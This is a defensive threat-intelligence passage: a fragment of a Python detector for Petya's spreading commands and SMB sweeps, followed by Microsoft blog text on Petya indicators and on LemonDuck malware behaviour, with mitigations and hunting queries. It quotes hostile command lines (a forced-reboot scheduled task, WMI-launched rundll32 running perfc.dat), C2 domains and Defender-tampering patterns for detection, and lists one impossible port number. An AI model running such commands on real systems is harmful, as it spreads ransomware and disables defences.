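     "cmdline": r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL'},
]

# Constructed flow records (src, dst, dst_port): a sweeping workstation, a sweeping DC, a normal client.
SAMPLE_FLOWS = (
    [("10.1.1.20", f"10.1.1.{i}", 445) for i in range(1, 16)]
    + [("10.1.0.5", f"10.1.{s}.{i}", 139) for s in range(1, 5) for i in (10, 11, 12)]
    + [("10.1.1.50", "10.1.1.10", 445), ("10.1.1.50", "10.1.1.11", 80)]
)

if __name__ == "__main__":
    for h in scan_command_lines(SAMPLE_EVENTS):
        print(h)
    for src, why in detect_smb_scanning(SAMPLE_FLOWS).items():
        print(src, why)
```

The rundll32 rule deliberately overlaps the WMIC and PsExec rules, so one record can produce several hits; the rule names tell the analyst which spreading path was used, while the /ST delay check separates the Petya reboot task from ordinary scheduled tasks.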
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 
x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"<system folder>\\shutdown.exe /r /f\" /ST <time>_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST <time>_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered 
with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n* * *\n\n_Source: \"New ransomware, old techniques: Petya adds worm capabilities\", Microsoft Malware Protection Center blog, published 2017-06-28, <https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>. Related CVEs: CVE-2017-0144, CVE-2017-0145 (CVSS v3.0 base score 8.1, vector CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 base score 9.3, vector AV:N/AC:M/Au:N/C:C/I:C/A:C). Corpus record MMPC:F4F919BF0CF7F97FD15CFA500398C7D9._\n\n* * *\n\n_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.]_\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. 
We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added to the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden files.\n\nSimilarly, _IF.Bin_ attempts to brute force credentials and exploit vulnerabilities in SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying includes 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The count of mailbox contacts is also sent to the attacker, likely to evaluate the campaign\u2019s effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this scenario could lead to a situation where, because a system no longer appears to be unpatched, suspicious activity that occurred before patching is ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, and so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days' worth of raw data to inspect events in your network and locate potential LemonDuck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab and select **Last 30 days** from the calendar drop-down menu.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines, seen from 2020 to 2021, that dropped scripts use when attaching malicious LemonDuck samples to emails and mailing them to contacts of the mailboxes on impacted machines. Additionally, checks whether attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though these, like the subject lines themselves, may change. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for runs of a function named \u201cSIEX\u201d, which the LemonDuck initializing scripts use to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of known LemonDuck keyword variations in command lines initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware uses _WMIC.exe_ to enumerate installed products by name and call their uninstall method non-interactively, targeting security products such as Kaspersky, Avast, ESET, and Norton Security, or any product with \u201cSecurity\u201d or \u201cAntiVirus\u201d in the name. Matches for products that are not deployed in the environment are particularly useful, and when seen together with other LemonDuck TTPs this behavior can help validate a LemonDuck infection. 
